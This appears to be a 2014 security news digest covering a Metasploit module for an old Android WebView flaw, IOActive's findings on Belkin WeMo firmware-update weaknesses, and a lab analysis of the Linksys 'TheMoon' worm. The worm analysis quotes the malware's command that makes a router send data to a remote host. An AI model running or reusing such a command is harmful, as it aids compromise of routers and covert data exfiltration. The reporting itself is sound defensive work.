Information Security News
Recently-released attack code exploiting a critical Android vulnerability gives attackers a point-and-click interface for hacking a majority of smartphones and tablets that run the Google operating system, its creators said.
The attack was published last week as a module to the open-source Metasploit exploit framework used by security professionals and hackers alike. The code exploits a critical bug in Android's WebView programming interface that was disclosed 14 months ago. The security hole typically gives attackers remote access to a phone's camera and file system and in some cases also exposes other resources, such as geographic location data, and contents of SD cards and address books. Google patched the vulnerability in November with the release of Android 4.2, but according to the company's figures, the fix is installed on well under half of the handsets it tracks.
"This vulnerability is kind of a huge deal," Tod Beardsley, a researcher for Metasploit maintainer Rapid7, wrote in a recent blog post. "I'm hopeful that by publishing an E-Z-2-Use Metasploit module that exploits it, we can maybe push some vendors toward ensuring that single-click vulnerabilities like this don't last for 93+ weeks in the wild. Don't believe me that this thing is that old? Just take a look at the module's references if you don't believe me."
Security researchers have taken the unusual step of recommending that people stop using Belkin's WeMo home automation products after uncovering a variety of vulnerabilities that attackers can exploit to take control of home networks, thermostats, or other connected devices.
WeMo products allow people to use smartphones and computers to remotely control light switches, Web cams, motion sensors, and other home appliances. Now the items are exposing the password and cryptographic signing key used to ensure that firmware updates are valid, according to an advisory published Tuesday by researchers from security firm IOActive. Attackers can use the credentials to bypass WeMo security checks and sign malicious firmware that masquerades as an official release from Belkin.
WeMo devices also fail to validate secure socket layer certificates when connecting to Belkin servers, even when the devices are running firmware that's fully up-to-date. What's more, firmware update notices are delivered through handsets or computers paired with the WeMo products and use a non-encrypted channel. IOActive Principle Research Scientist Mike Davis said he was able to combine exploits for those weaknesses into an attack that spoofed the RSS feed Belkin uses to push firmware updates to WeMo products. The counterfeit feeds, in turn, surreptitiously infected the devices with malware.
Using a vulnerable Linksys E1200 router in a lab, I was finally able to capture the complete (?) sequence of exploits used by the Linksys Worm "TheMoon".
The quick summary of what I found so far:
I did not see any configuration changes in the router (password, DNS...)
As we wrote earlier, the initial "HNAP1" request is just used to fingerprint the router to figure out if it is vulnerable.
The worm sends a number of DNS queries:
The "Gerty" binary checks in with the host the infection comes from. The ports are send as parameters. In my case, the complete command was:
cd /tmp/;./Gerty -L 188.8.131.52:8080:9841 -u xxxxxx
As a result, the connection went to port 9841 at 184.108.40.206. About 1.4MBytes are sent, most of it binary. But there are a few readable strings like a timestamp, the SSID of the router and the string "Lunar Industries LTD".
For a full pcap of the activity, see https://isc.sans.edu/diaryimages/moon.pcap . I tried to anonymize the pcap as much as possible, but some of the IPs were left intact. If you find anything else, please let me know. Note that the pcap includes a capture of the binary file as well (look for the http traffic on port 700). To protect others, I redirected all outbound port 80/8080 traffic to a sinkhole which may cause some artifacts.
Why vulnerability scans give infosec officers nightmares
Computer Business Review
Why vulnerability scans give infosec officers nightmares. Malware. by Duncan MacRae| 18 February 2014. Ron Gula, Tenable Network Security CEO, says organisations are turning to continuous monitoring to close the gaps left by traditional vulnerability ...
Posted by InfoSec News on Feb 18http://online.wsj.com/news/articles/SB10001424052702304899704579389171658671940?mg=reno64-wsj&url=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702304899704579389171658671940.html